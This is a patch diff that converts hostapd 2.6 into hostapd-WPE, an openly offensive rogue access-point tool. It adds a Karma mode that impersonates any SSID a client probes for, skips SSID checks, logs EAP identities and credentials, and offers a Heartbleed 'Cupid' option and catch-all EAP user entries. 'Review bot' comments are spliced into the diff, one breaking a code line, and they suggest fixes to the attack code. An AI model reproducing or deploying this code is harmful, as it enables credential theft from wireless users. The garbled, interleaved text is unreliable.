2934+# 0 = P2P specification (Address3 = AP BSSID) workaround enabled by default
2935+# based on GAS request Address3
2936+# 1 = IEEE 802.11 standard compliant regardless of GAS request Address3
2937+# 2 = Force non-compliant behavior (Address3 = AP BSSID for all cases)
2938+#gas_address3=0
2939+
2940+# QoS Map Set configuration
2941+#
2942+# Comma delimited QoS Map Set in decimal values
2943+# (see IEEE Std 802.11-2012, 8.4.2.97)
2944+#
2945+# format:
2946+# [<DSCP Exceptions[DSCP,UP]>,]<UP 0 range[low,high]>,...<UP 7 range[low,high]>
2947+#
2948+# There can be up to 21 optional DSCP Exceptions which are pairs of DSCP Value
2949+# (0..63 or 255) and User Priority (0..7). This is followed by eight DSCP Range
2950+# descriptions with DSCP Low Value and DSCP High Value pairs (0..63 or 255) for
2951+# each UP starting from 0. If both low and high value are set to 255, the
2952+# corresponding UP is not used.
2953+#
2954+# default: not set
2955+#qos_map_set=53,2,22,6,8,15,0,7,255,255,16,31,32,39,255,255,40,47,255,255
2956+
2957+##### Hotspot 2.0 #############################################################
2958+
2959+# Enable Hotspot 2.0 support
2960+#hs20=1
2961+
2962+# Disable Downstream Group-Addressed Forwarding (DGAF)
2963+# This can be used to configure a network where no group-addressed frames are
2964+# allowed.
The AP will not forward any group-address frames to the stations and
2965+# random GTKs are issued for each station to prevent associated stations from
2966+# forging such frames to other stations in the BSS.
2967+#disable_dgaf=1
2968+
2969+# OSU Server-Only Authenticated L2 Encryption Network
2970+#osen=1
2971+
2972+# ANQP Domain ID (0..65535)
2973+# An identifier for a set of APs in an ESS that share the same common ANQP
2974+# information. 0 = Some of the ANQP information is unique to this AP (default).
2975+#anqp_domain_id=1234
2976+
2977+# Deauthentication request timeout
2978+# If the RADIUS server indicates that the station is not allowed to connect to
2979+# the BSS/ESS, the AP can allow the station some time to download a
2980+# notification page (URL included in the message). This parameter sets that
2981+# timeout in seconds.
2982+#hs20_deauth_req_timeout=60
2983+
2984+# Operator Friendly Name
2985+# This parameter can be used to configure one or more Operator Friendly Name
2986+# Duples. Each entry has a two or three character language code (ISO-639)
2987+# separated by colon from the operator friendly name string.
2988+#hs20_oper_friendly_name=eng:Example operator
2989+#hs20_oper_friendly_name=fin:Esimerkkioperaattori
2990+
2991+# Connection Capability
2992+# This can be used to advertise what type of IP traffic can be sent through the
2993+# hotspot (e.g., due to firewall allowing/blocking protocols/ports).
2994+# format: <IP Protocol>:<Port Number>:<Status>
2995+# IP Protocol: 1 = ICMP, 6 = TCP, 17 = UDP
2996+# Port Number: 0..65535
2997+# Status: 0 = Closed, 1 = Open, 2 = Unknown
2998+# Each hs20_conn_capab line is added to the list of advertised tuples.
2999+#hs20_conn_capab=1:0:2
3000+#hs20_conn_capab=6:22:1
3001+#hs20_conn_capab=17:5060:0
3002+
3003+# WAN Metrics
3004+# format: <WAN Info>:<DL Speed>:<UL Speed>:<DL Load>:<UL Load>:<LMD>
3005+# WAN Info: B0-B1: Link Status, B2: Symmetric Link, B3: At Capabity
3006+# (encoded as two hex digits)
3007+# Link Status: 1 = Link up, 2 = Link down, 3 = Link in test state
3008+# Downlink Speed: Estimate of WAN backhaul link current downlink speed in kbps;
3009+# 1..4294967295; 0 = unknown
3010+# Uplink Speed: Estimate of WAN backhaul link current uplink speed in kbps
3011+# 1..4294967295; 0 = unknown
3012+# Downlink Load: Current load of downlink WAN connection (scaled to 255 = 100%)
3013+# Uplink Load: Current load of uplink WAN connection (scaled to 255 = 100%)
3014+# Load Measurement Duration: Duration for measuring downlink/uplink load in
3015+# tenths of a second (1..65535); 0 if load cannot be determined
3016+#hs20_wan_metrics=01:8000:1000:80:240:3000
3017+
3018+# Operating Class Indication
3019+# List of operating classes the BSSes in this ESS use. The Global operating
3020+# classes in Table E-4 of IEEE Std 802.11-2012 Annex E define the values that
3021+# can be used in this.
3022+# format: hexdump of operating class octets
3023+# for example, operating classes 81 (2.4 GHz channels 1-13) and 115 (5 GHz
3024+# channels 36-48):
3025+#hs20_operating_class=5173
3026+
3027+# OSU icons
3028+# <Icon Width>:<Icon Height>:<Language code>:<Icon Type>:<Name>:<file path>
3029+#hs20_icon=32:32:eng:image/png:icon32:/tmp/icon32.png
3030+#hs20_icon=64:64:eng:image/png:icon64:/tmp/icon64.png
3031+
3032+# OSU SSID (see ssid2 for format description)
3033+# This is the SSID used for all OSU connections to all the listed OSU Providers.
3034+#osu_ssid="example"
3035+
3036+# OSU Providers
3037+# One or more sets of following parameter. Each OSU provider is started by the
3038+# mandatory osu_server_uri item. The other parameters add information for the
3039+# last added OSU provider.
3040+# 3041+#osu_server_uri=https://example.com/osu/ 3042+#osu_friendly_name=eng:Example operator 3043+#osu_friendly_name=fin:Esimerkkipalveluntarjoaja 3044+#osu_nai=anonymous@example.com 3045+#osu_method_list=1 0 3046+#osu_icon=icon32 3047+#osu_icon=icon64 3048+#osu_service_desc=eng:Example services 3049+#osu_service_desc=fin:Esimerkkipalveluja 3050+# 3051+#osu_server_uri=... 3052+ 3053+##### Fast Session Transfer (FST) support ##################################### 3054+# 3055+# The options in this section are only available when the build configuration 3056+# option CONFIG_FST is set while compiling hostapd. They allow this interface 3057+# to be a part of FST setup. 3058+# 3059+# FST is the transfer of a session from a channel to another channel, in the 3060+# same or different frequency bands. 3061+# 3062+# For detals, see IEEE Std 802.11ad-2012. 3063+ 3064+# Identifier of an FST Group the interface belongs to. 3065+#fst_group_id=bond0 3066+ 3067+# Interface priority within the FST Group. 3068+# Announcing a higher priority for an interface means declaring it more 3069+# preferable for FST switch. 3070+# fst_priority is in 1..255 range with 1 being the lowest priority. 3071+#fst_priority=100 3072+ 3073+# Default LLT value for this interface in milliseconds. The value used in case 3074+# no value provided during session setup. Default is 50 ms. 3075+# fst_llt is in 1..4294967 range (due to spec limitation, see 10.32.2.2 3076+# Transitioning between states). 
3077+#fst_llt=100 3078+ 3079+##### Radio measurements / location ########################################### 3080+ 3081+# The content of a LCI measurement subelement 3082+#lci=<Hexdump of binary data of the LCI report> 3083+ 3084+# The content of a location civic measurement subelement 3085+#civic=<Hexdump of binary data of the location civic report> 3086+ 3087+# Enable neighbor report via radio measurements 3088+#rrm_neighbor_report=1 3089+ 3090+# Publish fine timing measurement (FTM) responder functionality 3091+# This parameter only controls publishing via Extended Capabilities element. 3092+# Actual functionality is managed outside hostapd. 3093+#ftm_responder=0 3094+ 3095+# Publish fine timing measurement (FTM) initiator functionality 3096+# This parameter only controls publishing via Extended Capabilities element. 3097+# Actual functionality is managed outside hostapd. 3098+#ftm_initiator=0 3099+ 3100+##### TESTING OPTIONS ######################################################### 3101+# 3102+# The options in this section are only available when the build configuration 3103+# option CONFIG_TESTING_OPTIONS is set while compiling hostapd. They allow 3104+# testing some scenarios that are otherwise difficult to reproduce. 3105+# 3106+# Ignore probe requests sent to hostapd with the given probability, must be a 3107+# floating point number in the range [0, 1). 
3108+#ignore_probe_probability=0.0 3109+# 3110+# Ignore authentication frames with the given probability 3111+#ignore_auth_probability=0.0 3112+# 3113+# Ignore association requests with the given probability 3114+#ignore_assoc_probability=0.0 3115+# 3116+# Ignore reassociation requests with the given probability 3117+#ignore_reassoc_probability=0.0 3118+# 3119+# Corrupt Key MIC in GTK rekey EAPOL-Key frames with the given probability 3120+#corrupt_gtk_rekey_mic_probability=0.0 3121+# 3122+# Include only ECSA IE without CSA IE where possible 3123+# (channel switch operating class is needed) 3124+#ecsa_ie_only=0 3125+ 3126+##### Multiple BSSID support ################################################## 3127+# 3128+# Above configuration is using the default interface (wlan#, or multi-SSID VLAN 3129+# interfaces). Other BSSIDs can be added by using separator 'bss' with 3130+# default interface name to be allocated for the data packets of the new BSS. 3131+# 3132+# hostapd will generate BSSID mask based on the BSSIDs that are 3133+# configured. hostapd will verify that dev_addr & MASK == dev_addr. If this is 3134+# not the case, the MAC address of the radio must be changed before starting 3135+# hostapd (ifconfig wlan0 hw ether <MAC addr>). If a BSSID is configured for 3136+# every secondary BSS, this limitation is not applied at hostapd and other 3137+# masks may be used if the driver supports them (e.g., swap the locally 3138+# administered bit) 3139+# 3140+# BSSIDs are assigned in order to each BSS, unless an explicit BSSID is 3141+# specified using the 'bssid' parameter. 
3142+# If an explicit BSSID is specified, it must be chosen such that it: 3143+# - results in a valid MASK that covers it and the dev_addr 3144+# - is not the same as the MAC address of the radio 3145+# - is not the same as any other explicitly specified BSSID 3146+# 3147+# Alternatively, the 'use_driver_iface_addr' parameter can be used to request 3148+# hostapd to use the driver auto-generated interface address (e.g., to use the 3149+# exact MAC addresses allocated to the device). 3150+# 3151+# Not all drivers support multiple BSSes. The exact mechanism for determining 3152+# the driver capabilities is driver specific. With the current (i.e., a recent 3153+# kernel) drivers using nl80211, this information can be checked with "iw list" 3154+# (search for "valid interface combinations"). 3155+# 3156+# Please note that hostapd uses some of the values configured for the first BSS 3157+# as the defaults for the following BSSes. However, it is recommended that all 3158+# BSSes include explicit configuration of all relevant configuration items. 3159+# 3160+#bss=wlan0_0 3161+#ssid=test2 3162+# most of the above items can be used here (apart from radio interface specific 3163+# items, like channel) 3164+ 3165+#bss=wlan0_1 3166+#bssid=00:13:10:95:fe:0b 3167+# ... 3168diff -rupN hostapd-2.6/hostapd/hostapd-wpe.eap_user hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user 3169--- hostapd-2.6/hostapd/hostapd-wpe.eap_user 1970-01-01 01:00:00.000000000 +0100 3170+++ hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user 2018-05-21 11:37:58.859577170 +0200 3171@@ -0,0 +1,107 @@ 3172+# hostapd user database for integrated EAP server 3173+ 3174+# Each line must contain an identity, EAP method(s), and an optional password 3175+# separated with whitespace (space or tab). The identity and password must be 3176+# double quoted ("user"). 
Password can alternatively be stored as 3177+# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password 3178+# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means 3179+# that the plaintext password does not need to be included in the user file. 3180+# Password hash is stored as hash:<16-octets of hex data> without quotation 3181+# marks. 3182+ 3183+# [2] flag in the end of the line can be used to mark users for tunneled phase 3184+# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous 3185+# identity can be used in the unencrypted phase 1 and the real user identity 3186+# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous 3187+# access is needed, two user entries is needed, one for phase 1 and another 3188+# with the same username for phase 2. 3189+# 3190+# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use 3191+# password option. 3192+# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a 3193+# password. 3194+# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration. 3195+# 3196+# * can be used as a wildcard to match any user identity. The main purposes for 3197+# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to 3198+# avoid having to configure every certificate for EAP-TLS authentication. The 3199+# first matching entry is selected, so * should be used as the last phase 1 3200+# user entry. 3201+# 3202+# "prefix"* can be used to match the given prefix and anything after this. The 3203+# main purpose for this is to be able to avoid EAP method negotiation when the 3204+# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This 3205+# is only allowed for phase 1 identities. 3206+# 3207+# Multiple methods can be configured to make the authenticator try them one by 3208+# one until the peer accepts one. The method names are separated with a 3209+# comma (,). 
3210+# 3211+# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP 3212+# version based on the Phase 1 identity. Without this flag, the EAP 3213+# authenticator advertises the highest supported version and select the version 3214+# based on the first PEAP packet from the supplicant. 3215+# 3216+# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel. 3217+# Tunneled EAP methods are configured with standard EAP method name and [2] 3218+# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP, 3219+# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a 3220+# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password 3221+# hash. 3222+# 3223+# Arbitrary RADIUS attributes can be added into Access-Accept packets similarly 3224+# to the way radius_auth_req_attr is used for Access-Request packet in 3225+# hostapd.conf. For EAP server, this is configured separately for each user 3226+# entry with radius_accept_attr=<value> line(s) following the main user entry 3227+# line. 
3228+ 3229+# Phase 1 users 3230+#"user" MD5 "password" 3231+#"test user" MD5 "secret" 3232+#"example user" TLS 3233+#"DOMAIN\user" MSCHAPV2 "password" 3234+#"gtc user" GTC "password" 3235+#"pax user" PAX "unknown" 3236+#"pax.user@example.com" PAX 0123456789abcdef0123456789abcdef 3237+#"psk user" PSK "unknown" 3238+#"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef 3239+#"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef 3240+#"ttls" TTLS 3241+#"not anonymous" PEAP 3242+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes 3243+#"0"* AKA,TTLS,TLS,PEAP,SIM 3244+#"1"* SIM,TTLS,TLS,PEAP,AKA 3245+#"2"* AKA,TTLS,TLS,PEAP,SIM 3246+#"3"* SIM,TTLS,TLS,PEAP,AKA 3247+#"4"* AKA,TTLS,TLS,PEAP,SIM 3248+#"5"* SIM,TTLS,TLS,PEAP,AKA 3249+#"6"* AKA' 3250+#"7"* AKA' 3251+#"8"* AKA' 3252+ 3253+# Wildcard for all other identities 3254+#* PEAP,TTLS,TLS,SIM,AKA 3255+ 3256+# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users 3257+#"t-md5" MD5 "password" [2] 3258+#"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2] 3259+#"t-gtc" GTC "password" [2] 3260+#"not anonymous" MSCHAPV2 "password" [2] 3261+#"user" MD5,GTC,MSCHAPV2 "password" [2] 3262+#"test user" MSCHAPV2 hash:000102030405060708090a0b0c0d0e0f [2] 3263+#"ttls-user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2 "password" [2] 3264+ 3265+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes in phase 2 3266+#"0"* AKA [2] 3267+#"1"* SIM [2] 3268+#"2"* AKA [2] 3269+#"3"* SIM [2] 3270+#"4"* AKA [2] 3271+#"5"* SIM [2] 3272+#"6"* AKA' [2] 3273+#"7"* AKA' [2] 3274+#"8"* AKA' [2] 3275+ 3276+# WPE - DO NOT REMOVE - These entries are specifically in here 3277+* PEAP,TTLS,TLS,FAST 3278+"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2] 3279diff -rupN hostapd-2.6/hostapd/main.c hostapd-2.6-wpe/hostapd/main.c 3280--- hostapd-2.6/hostapd/main.c 2016-10-02 20:51:11.000000000 +0200 3281+++ hostapd-2.6-wpe/hostapd/main.c 2018-05-21 11:37:58.859577170 
+0200 3282@@ -28,7 +28,7 @@ 3283 #include "config_file.h" 3284 #include "eap_register.h" 3285 #include "ctrl_iface.h" 3286- 3287+#include "wpe/wpe.h" 3288 3289 struct hapd_global { 3290 void **drv_priv; 3291@@ -448,11 +448,16 @@ static int hostapd_global_run(struct hap 3292 static void show_version(void) 3293 { 3294 fprintf(stderr, 3295- "hostapd v" VERSION_STR "\n" 3296+ "hostapd-WPE v" VERSION_STR "\n" 3297 "User space daemon for IEEE 802.11 AP management,\n" 3298 "IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n" 3299 "Copyright (c) 2002-2016, Jouni Malinen <j@w1.fi> " 3300- "and contributors\n"); 3301+ "and contributors\n" 3302+ "-----------------------------------------------------\n" 3303+ "WPE (Wireless Pwnage Edition)\n" 3304+ "This version has been cleverly modified to target\n" 3305+ "wired and wireless users.\n" 3306+ "Thomas d'Otreppe <@aircrackng>"); 3307 } 3308 3309 3310@@ -461,7 +466,7 @@ static void usage(void) 3311 show_version(); 3312 fprintf(stderr, 3313 "\n" 3314- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] " 3315+ "usage: hostapd-wpe [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] " 3316 "\\\n" 3317 " [-g <global ctrl_iface>] [-G <group>]\\\n" 3318 " [-i <comma-separated list of interface names>]\\\n" 3319@@ -486,7 +491,15 @@ static void usage(void) 3320 " -i list of interface names to use\n" 3321 " -S start all the interfaces synchronously\n" 3322 " -t include timestamps in some debug messages\n" 3323- " -v show hostapd version\n"); 3324+ " -v show hostapd version\n\n" 3325+ "\n" 3326+ " WPE Options -------------------\n" 3327+ " (credential logging always enabled)\n" 3328+ " -s Return Success where possible\n" 3329+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3330+ " -c Cupid Mode (Heartbleed clients)\n\n" 3331+#endif 3332+ " -k Karma Mode (Respond to all probes)\n\n"); 3333 3334 exit(1); 3335 } 3336@@ -661,7 +674,7 @@ int main(int argc, char *argv[]) 3337 dl_list_init(&interfaces.global_ctrl_dst); 3338 3339 for (;;) { 3340- c = 
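Review bot: The last literal in the new show_version() banner, `"Thomas d'Otreppe <@aircrackng>"`, has no trailing newline, so when show_version() is the final thing printed (the `-v` path, handled outside these hunks) the next shell prompt lands on the same line; end it with `\n`. usage() only masks this because it happens to print `"\n"` right after calling show_version().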
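Review bot: The `-c` entry in the usage text is compiled only when `OPENSSL_VERSION_NUMBER < 0x10100000L`, but the getopt string `"b:Bde:f:hi:KP:STtu:vg:G:kcs"` and the `case 'c':` in the two following hunks accept the option unconditionally, while the uses of `wpe_conf.wpe_enable_cupid` in tls_openssl.c sit behind that same `#if`, so on newer OpenSSL the flag is accepted and silently does nothing. Wrap `case 'c':` in the same `#if` (or reject it with a message) so behaviour matches the help text. main.c does not visibly include an OpenSSL header, so unless `wpe/wpe.h` (not in this chunk) pulls in `<openssl/opensslv.h>`, `OPENSSL_VERSION_NUMBER` is undefined here, the preprocessor treats it as 0, and the `-c` line is printed regardless of the installed OpenSSL. The `"\n\n"` on the `-v` line followed by the bare `"\n"` also prints three newlines where one blank line was presumably intended.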
getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:"); 3341+ c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:kcs"); 3342 if (c < 0) 3343 break; 3344 switch (c) { 3345@@ -725,6 +738,15 @@ int main(int argc, char *argv[]) 3346 case 'u': 3347 return gen_uuid(optarg); 3348 #endif /* CONFIG_WPS */ 3349+ case 'k': 3350+ wpe_conf.wpe_enable_karma++; 3351+ break; 3352+ case 'c': 3353+ wpe_conf.wpe_enable_cupid++; 3354+ break; 3355+ case 's': 3356+ wpe_conf.wpe_enable_return_success++; 3357+ break; 3358 case 'i': 3359 if (hostapd_get_interface_names(&if_names, 3360 &if_names_size, optarg)) 3361diff -rupN hostapd-2.6/hostapd/Makefile hostapd-2.6-wpe/hostapd/Makefile 3362--- hostapd-2.6/hostapd/Makefile 2016-10-02 20:51:11.000000000 +0200 3363+++ hostapd-2.6-wpe/hostapd/Makefile 2018-05-21 11:37:58.863577170 +0200 3364@@ -86,6 +86,7 @@ OBJS += ../src/ap/beacon.o 3365 OBJS += ../src/ap/bss_load.o 3366 OBJS += ../src/ap/neighbor_db.o 3367 OBJS += ../src/ap/rrm.o 3368+OBJS += ../src/wpe/wpe.o 3369 3370 OBJS_c = hostapd_cli.o 3371 OBJS_c += ../src/common/wpa_ctrl.o 3372@@ -1012,7 +1013,7 @@ OBJS += ../src/fst/fst_ctrl_iface.o 3373 endif 3374 endif 3375 3376-ALL=hostapd hostapd_cli 3377+ALL=hostapd-wpe hostapd-wpe_cli 3378 3379 all: verify_config $(ALL) 3380 3381@@ -1051,6 +1052,15 @@ $(DESTDIR)$(BINDIR)/%: % 3382 3383 install: $(addprefix $(DESTDIR)$(BINDIR)/,$(ALL)) 3384 3385+wpe: 3386+ install -d $(DESTDIR)/etc/hostapd-wpe 3387+ install -m 644 hostapd-wpe.conf hostapd-wpe.eap_user $(DESTDIR)/etc/hostapd-wpe 3388+ install -d $(DESTDIR)/etc/hostapd-wpe/certs 3389+ install -d $(DESTDIR)/etc/hostapd-wpe/certs/demoCA 3390+ install -m 644 certs/demoCA/cacert.pem $(DESTDIR)/etc/hostapd-wpe/certs/demoCA 3391+ install -m 755 certs/bootstrap $(DESTDIR)/etc/hostapd-wpe/certs 3392+ install -m 644 certs/ca.cnf certs/client.cnf certs/Makefile certs/README certs/README.wpe certs/server.cnf certs/xpextensions $(DESTDIR)/etc/hostapd-wpe/certs 3393+ 3394 ../src/drivers/build.hostapd: 3395 @if [ -f 
../src/drivers/build.wpa_supplicant ]; then \ 3396 $(MAKE) -C ../src/drivers clean; \ 3397@@ -1059,15 +1069,15 @@ install: $(addprefix $(DESTDIR)$(BINDIR) 3398 3399 BCHECK=../src/drivers/build.hostapd 3400 3401-hostapd: $(BCHECK) $(OBJS) 3402- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS) 3403+hostapd-wpe: $(BCHECK) $(OBJS) 3404+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe $(OBJS) $(LIBS) 3405 @$(E) " LD " $@ 3406 3407 ifdef CONFIG_WPA_TRACE 3408 OBJS_c += ../src/utils/trace.o 3409 endif 3410-hostapd_cli: $(OBJS_c) 3411- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c) 3412+hostapd-wpe_cli: $(OBJS_c) 3413+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe_cli $(OBJS_c) $(LIBS_c) 3414 @$(E) " LD " $@ 3415 3416 NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) 3417@@ -1114,7 +1124,7 @@ lcov-html: 3418 3419 clean: 3420 $(MAKE) -C ../src clean 3421- rm -f core *~ *.o hostapd hostapd_cli nt_password_hash hlr_auc_gw 3422+ rm -f core *~ *.o hostapd-wpe hostapd-wpe_cli nt_password_hash hlr_auc_gw 3423 rm -f *.d *.gcno *.gcda *.gcov 3424 rm -f lcov.info 3425 rm -rf lcov-html 3426diff -rupN hostapd-2.6/src/ap/beacon.c hostapd-2.6-wpe/src/ap/beacon.c 3427--- hostapd-2.6/src/ap/beacon.c 2016-10-02 20:51:11.000000000 +0200 3428+++ hostapd-2.6-wpe/src/ap/beacon.c 2018-05-21 11:37:58.863577170 +0200 3429@@ -30,7 +30,7 @@ 3430 #include "hs20.h" 3431 #include "dfs.h" 3432 #include "taxonomy.h" 3433- 3434+#include "wpe/wpe.h" 3435 3436 #ifdef NEED_AP_MLME 3437 3438@@ -817,6 +817,13 @@ void handle_probe_req(struct hostapd_dat 3439 } 3440 #endif /* CONFIG_TAXONOMY */ 3441 3442+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) { 3443+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len)); 3444+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len); 3445+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len); 3446+ hapd->conf->ssid.ssid_len = elems.ssid_len; 3447+ } 3448+ 3449 res = 
ssid_match(hapd, elems.ssid, elems.ssid_len, 3450 elems.ssid_list, elems.ssid_list_len); 3451 if (res == NO_SSID_MATCH) { 3452diff -rupN hostapd-2.6/src/ap/ieee802_11.c hostapd-2.6-wpe/src/ap/ieee802_11.c 3453--- hostapd-2.6/src/ap/ieee802_11.c 2016-10-02 20:51:11.000000000 +0200 3454+++ hostapd-2.6-wpe/src/ap/ieee802_11.c 2018-05-21 11:37:58.863577170 +0200 3455@@ -45,7 +45,7 @@ 3456 #include "mbo_ap.h" 3457 #include "rrm.h" 3458 #include "taxonomy.h" 3459- 3460+#include "wpe/wpe.h" 3461 3462 u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid) 3463 { 3464@@ -1418,8 +1418,8 @@ static u16 check_ssid(struct hostapd_dat 3465 if (ssid_ie == NULL) 3466 return WLAN_STATUS_UNSPECIFIED_FAILURE; 3467 3468- if (ssid_ie_len != hapd->conf->ssid.ssid_len || 3469- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) { 3470+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len || 3471+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) { 3472 hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211, 3473 HOSTAPD_LEVEL_INFO, 3474 "Station tried to associate with unknown SSID " 3475diff -rupN hostapd-2.6/src/ap/ieee802_1x.c hostapd-2.6-wpe/src/ap/ieee802_1x.c 3476--- hostapd-2.6/src/ap/ieee802_1x.c 2016-10-02 20:51:11.000000000 +0200 3477+++ hostapd-2.6-wpe/src/ap/ieee802_1x.c 2018-05-21 11:54:26.455559484 +0200 3478@@ -729,6 +729,9 @@ static void handle_eap_response(struct h 3479 { 3480 u8 type, *data; 3481 struct eapol_state_machine *sm = sta->eapol_sm; 3482+ const u8 *identity; 3483+ size_t identity_len; 3484+ 3485 if (sm == NULL) 3486 return; 3487 3488@@ -747,6 +750,16 @@ static void handle_eap_response(struct h 3489 eap->code, eap->identifier, be_to_host16(eap->length), 3490 eap_server_get_name(0, type), type); 3491 3492+/* Print Response-Identity from STA*/ 3493+ identity = eap_get_identity(sm->eap, &identity_len); 3494+ os_free(sm->identity); 3495+ sm->identity = (u8 *) dup_binstr(identity, identity_len); 3496+ 
sm->identity_len = identity_len; 3497+ if (identity != NULL) { 3498+ hostapd_logger(hapd, sm->addr, HOSTAPD_MODULE_IEEE8021X, 3499+ HOSTAPD_LEVEL_INFO, "Identity received from STA: '%s'", sm->identity); 3500+ } 3501+ 3502 sm->dot1xAuthEapolRespFramesRx++; 3503 3504 wpabuf_free(sm->eap_if->eapRespData); 3505diff -rupN hostapd-2.6/src/crypto/ms_funcs.h hostapd-2.6-wpe/src/crypto/ms_funcs.h 3506--- hostapd-2.6/src/crypto/ms_funcs.h 2016-10-02 20:51:11.000000000 +0200 3507+++ hostapd-2.6-wpe/src/crypto/ms_funcs.h 2018-05-21 11:37:58.863577170 +0200 3508@@ -9,6 +9,10 @@ 3509 #ifndef MS_FUNCS_H 3510 #define MS_FUNCS_H 3511 3512+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge, 3513+ const u8 *username, size_t username_len, 3514+ u8 *challenge); 3515+ 3516 int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge, 3517 const u8 *username, size_t username_len, 3518 const u8 *password, size_t password_len, 3519diff -rupN hostapd-2.6/src/crypto/tls_openssl.c hostapd-2.6-wpe/src/crypto/tls_openssl.c 3520--- hostapd-2.6/src/crypto/tls_openssl.c 2016-10-02 20:51:11.000000000 +0200 3521+++ hostapd-2.6-wpe/src/crypto/tls_openssl.c 2018-05-21 11:37:58.863577170 +0200 3522@@ -21,6 +21,7 @@ 3523 #include <openssl/opensslv.h> 3524 #include <openssl/pkcs12.h> 3525 #include <openssl/x509v3.h> 3526+#include <openssl/rand.h> 3527 #ifndef OPENSSL_NO_ENGINE 3528 #include <openssl/engine.h> 3529 #endif /* OPENSSL_NO_ENGINE */ 3530@@ -37,6 +38,7 @@ 3531 #include "sha256.h" 3532 #include "tls.h" 3533 #include "tls_openssl.h" 3534+#include "wpe/wpe.h" 3535 3536 #if !defined(CONFIG_FIPS) && \ 3537 (defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \ 3538@@ -179,6 +181,10 @@ static int tls_add_ca_from_keystore_enco 3539 3540 #endif /* ANDROID */ 3541 3542+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3543+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top 3544+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3545+ 3546 static int 
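Review bot: The NULL check guards the wrong pointer: it tests `identity`, the value returned by eap_get_identity(), while the string handed to `%s` is `sm->identity`, the copy made by dup_binstr(), which is NULL when that allocation fails, and `sm->identity_len` is assigned regardless, leaving a NULL identity paired with a non-zero length. Test the copy instead, `if (sm->identity != NULL)`, and reset `sm->identity_len = 0` when the copy is NULL. The identity bytes come straight from the peer's EAP-Response/Identity, so logging them with a raw `%s` lets embedded control characters or line breaks reach the log; pass them through a printable/escaped form (the wpa_ssid_txt() helper used in the beacon.c hunk is the pattern) rather than the raw buffer. The enclosing handle_eap_response() starts before this hunk, and the column-0 comment `/* Print Response-Identity from STA*/` should be indented with the code it describes.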
